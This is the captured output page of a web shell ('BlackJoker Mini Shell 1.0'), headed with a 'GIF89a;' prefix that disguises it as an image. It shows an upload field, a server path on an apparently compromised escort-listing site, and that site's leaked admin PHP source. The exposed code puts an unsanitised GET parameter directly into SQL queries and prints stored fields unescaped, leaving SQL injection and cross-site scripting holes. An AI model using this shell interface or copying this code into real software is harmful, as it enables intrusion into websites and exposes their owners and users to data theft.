GIF89a; Mini Shell

Mini Shell

Direktori : /home/serb/public_html/admin/
Upload File :
Current File : /home/serb/public_html/admin/deltmessage_details.php

<? 
  include("../lib/globals.php");
  include("../lib/common.php");
  include("../lib/functions.php");
  $id=$_GET["id"];
  $sql="select * from delete_message where id='$id'";
  $rs=execute_query($sql);
  $row=mysql_fetch_array($rs);
  function format_comment($str)
  {
    if($str=="")
	{
	  return "None";
	}
	else
	{
	  return $str;
	}
  }
  $sql_city="SELECT * FROM citys where id='".$row['escort_city']."' ";

  $res_city=execute_query($sql_city);
 $row_city=mysql_fetch_array($res_city);

$sql_state="SELECT * FROM states where id='".$row_city['escort_state']."'";
$res_state=execute_query($sql_state);
 $row_state=mysql_fetch_array($res_state);
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>:: Escortseries | Admin ::</title>
</head>
<link rel="stylesheet" type="text/css" href="../style.css" />
<body>
<br>
<div id="homebottom3">
<table width="600" border="0" align="center" class="Table">
  <tr>
    <td width="3%">&nbsp;</td>
    <td width="21%">&nbsp;</td>
    <td width="75%">&nbsp;</td>
    <td width="1%">&nbsp;</td>
  </tr>
  <tr>
    <td>&nbsp;</td>
    <td align="left" valign="top" class="gtext"><strong>Category Name :</strong></td>
    <td align="left" class="gtext">&nbsp;<?
												
	 print stripslashes($row['del_category']);?></td>
    <td>&nbsp;</td>
  </tr>
  <tr height="5">
                    
                  </tr>
  <tr>
    <td>&nbsp;</td>
    <td align="left" valign="top" class="gtext"><strong>Message: </strong></td>
    <td align="left" class="gtext">&nbsp;<?
												
	 print stripslashes($row['contain']);?></td>
    <td>&nbsp;</td>
  </tr>
  
 
  <tr>
    <td colspan="4" align="center" class="gtext">&nbsp;</td>
  </tr>
  <tr>
    <td colspan="4" align="center" class="gtext">&nbsp;</td>
  </tr>
  <tr>
    <td colspan="4" align="center" class="gtext"><a href="javascript:window.close()" class="footer-link">[ Close window ] </a></td>
    </tr>
  <tr>
    <td colspan="4" align="center" class="gtext">&nbsp;</td>
  </tr>
</table>
</div>
</body>
</html>

./BlackJoker Mini Shell 1.0